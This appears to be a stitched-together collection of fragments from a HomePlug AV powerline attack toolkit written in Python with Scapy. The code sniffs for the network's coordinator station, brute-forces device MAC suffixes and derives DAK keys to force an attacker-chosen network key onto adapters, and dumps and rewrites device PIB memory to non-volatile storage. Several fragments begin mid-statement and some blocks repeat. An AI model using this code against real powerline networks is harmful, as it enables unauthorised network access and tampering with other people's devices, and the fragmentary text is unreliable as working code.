def setNMK(interface, mac, nmk):
# Building packet
pkt = Ether(dst=mac, ) / HomePlugAV() / SetEncryptionKeyRequest(
NMK=nmk, DestinationMAC=mac, EKS=1, PayloadEncKeySelect=0x0f, DAK=0)
# Sending packet and capturing answer
ans = srp1(pkt, iface=interface, verbose=False)
# Checking if operation succeeded
if ans.haslayer(SetEncryptionKeyConfirmation):
return True
return False
def checkAVLN(interface, mac):
# Building packet
pkt = Ether(dst=mac, ) / HomePlugAV() / NetworkInformationRequest()
# Sending packet
ans = srp1(pkt, iface=interface, verbose=False)
# Checking answer to determine if STA is member of an AVLN
if ans.haslayer(NetworkInfoConfirmationV10) or ans.haslayer(
NetworkInfoConfirmationV11):
if ans[NetworkInfoConfirmationV10].LogicalNetworksNumber > 0:
return True
return False
def dump_all(src, dst, iface):
offset = 0
length = 0x400
buff_ = ""
etherhome = Ether(src=src, dst=dst)/HomePlugAV()
pkt = etherhome/ReadModuleDataRequest(Offset=offset, Length=length)
res = srp1(pkt, iface=iface)
tModuleData = ModulePIB(res.ModuleData, offset, length)
PIBlen = tModuleData.PIBLength
nbreq = PIBlen/length
for i in range(0, nbreq*length, length):
pkt = etherhome/ReadModuleDataRequest(Offset=i, Length=length)
res = srp1(pkt, iface=iface)
buff_ += res.ModuleData
pkt = etherhome/ReadModuleDataRequest(Offset=i+length, Length=(PIBlen-nbreq*length))
res = srp1(pkt, iface=iface)
buff_ += res.ModuleData
return buff_
def rewrite_all(
data_,
dest,
src,
iface,
):
offset = 0
length = 0x400
etherhome = Ether(src=src, dst=dest) / HomePlugAV()
nbreq = len(data_) / length
for i in range(0, nbreq * length, length):
pkt = etherhome / WriteModuleDataRequest(
Offset=i, ModuleData=data_[i:i + length])
res = srp1(pkt, iface=iface)
pkt = etherhome / WriteModuleDataRequest(Offset=i + length,
ModuleData=data_[i + length:])
res = srp1(pkt, iface=iface)
# Write Data -> NVM
pkt = etherhome / WriteModuleData2NVMRequest()
res = srp1(pkt, iface=iface)
if res.haslayer("WriteModuleData2NVMConfirmation"):
if res[WriteModuleData2NVMConfirmation].Status == 0x0:
return True
return False
if macad not in dictio.keys() and macad != "00:00:00:00:00:00":
dictio[macad] = DAKgen(macad).generate()
print "\t Found CCo: %s (DAK: %s)" % (macad, dictio[macad])
if __name__ == "__main__":
usage = "usage: %prog [options] arg"
parser = OptionParser(usage)
parser.add_option(
"-i",
"--iface",
dest="iface",
default="eth0",
help=
"select an interface to Enable sniff mode and sniff indicates packets",
metavar="INTERFACE")
parser.add_option("-s",
"--source",
dest="sourcemac",
default="00:c4:ff:ee:00:00",
help="source MAC address to use",
metavar="SOURCEMARC")
(options, args) = parser.parse_args()
print "[+] Enabling sniff mode"
pkt = Ether(src=options.sourcemac) / HomePlugAV() / SnifferRequest(
SnifferControl=1) # We enable Sniff mode here
sendp(pkt, iface=options.iface)
print "[+] Listening for CCo station..."
sniff(prn=appendindic,
lfilter=lambda pkt: pkt.haslayer(HomePlugAV)) # capture the signal
usage = "usage: %prog [options] arg"
parser = OptionParser(usage)
parser.add_option("-i", "--iface", dest="iface", default="eth0",
help="select an interface to Enable sniff mode and sniff indicates packets", metavar="INTERFACE")
parser.add_option("-t", "--targets", dest="macaddress", default="",
help="Targets MAC address bytes", metavar="MACBYTES")
parser.add_option("-s", "--source", dest="sourcemac", default="00:c4:ff:ee:00:00",
help="source MAC address to use", metavar="SOURCEMARC")
parser.add_option("-k", "--key", dest="nmk", default="\x00"*16,
help="NMK key to configure", metavar="NMK")
(options, args) = parser.parse_args()
arg = options.macaddress
_bytes = [hex(x)[2:] for x in (range(0x100))]
products = itertools.product(_bytes, repeat=(6-len(arg)/2))
for x in products:
cmac = ''
for y in range(len(x)):
if len(x[y]) == 1:
cmac += '0'+ x[y]
else:
cmac += x[y]
newmac = arg + cmac
keygen = DAKgen(newmac)
DAKpass = keygen.generate()
pbkdf1 = PBKDF1(DAKpass, DAK_SALT, 16, hashlib.sha256())
pkt = Ether(src=options.sourcemac)/HomePlugAV()/SetEncryptionKeyRequest(NMK=options.nmk, EKS=1, DAK=binascii.unhexlify(pbkdf1))
sendp(pkt, iface=options.iface)
default="00:c4:ff:ee:00:00",
help="source MAC address to use",
metavar="SOURCEMAC")
parser.add_option("-k",
"--key",
dest="nmk",
default="\x00" * 16,
help="NMK key to configure",
metavar="NMK")
(options, args) = parser.parse_args()
arg = options.macaddress
_bytes = [hex(x)[2:] for x in (range(0x100))]
products = itertools.product(_bytes, repeat=(6 - len(arg) / 2))
for x in products:
cmac = ''
for y in range(len(x)):
if len(x[y]) == 1:
cmac += '0' + x[y]
else:
cmac += x[y]
newmac = arg + cmac
keygen = DAKgen(newmac)
DAKpass = keygen.generate()
pbkdf1 = PBKDF1(DAKpass, DAK_SALT, 16, hashlib.sha256())
pkt = Ether(
src=options.sourcemac) / HomePlugAV() / SetEncryptionKeyRequest(
NMK=options.nmk, EKS=1, DAK=binascii.unhexlify(pbkdf1))
sendp(pkt, iface=options.iface)
def listen():
sniff(prn=appendindic,
lfilter=lambda pkt: pkt.haslayer(HomePlugAV),
timeout=5)
if __name__ == "__main__":
usage = "usage: %prog [options] arg"
parser = OptionParser(usage)
parser.add_option(
"-i",
"--iface",
dest="iface",
default="eth0",
help=
"select an interface to Enable sniff mode and sniff indicates packets",
metavar="INTERFACE")
parser.add_option("-s",
"--source",
dest="sourcemac",
default="00:c4:ff:ee:00:00",
help="source MAC address to use",
metavar="SOURCEMARC")
(options, args) = parser.parse_args()
tlisten = threading.Thread(None, listen, None)
print "[+] Listening for confirmations..."
tlisten.start()
print "[+] Sending Get Device Type Requests"
pkt = Ether(src=options.sourcemac) / HomePlugAV()
sendp(pkt, iface=options.iface)
help="MAC address of your local attached PLC",
metavar="LOCALDEVICE")
parser.add_option("-k",
"--key",
dest="nmk",
default="\x00" * 16,
help="NMK key to configure",
metavar="NMK")
(options, args) = parser.parse_args()
if not options.localdevice: # if localdevice is not given
parser.error('Local Device MAC address not given')
# Set NMK to attacker device
zeroDAK = "\x00" * 16
pkt = Ether(
dst=options.localdevice) / HomePlugAV() / SetEncryptionKeyRequest(
NMK=options.nmk,
EKS=1,
DAK=zeroDAK,
DestinationMAC=options.localdevice,
PayloadEncKeySelect=0x0f)
ans = srp1(pkt, iface=options.iface, verbose=False, timeout=5)
if ans is None:
print "Packet sent with no answer..."
exit(1)
if ans[1].haslayer(SetEncryptionKeyConfirmation):
print "Set NMK key with success!"
else:
print "There was an error while setting the NMK. Is the localdevice wired to your computer?"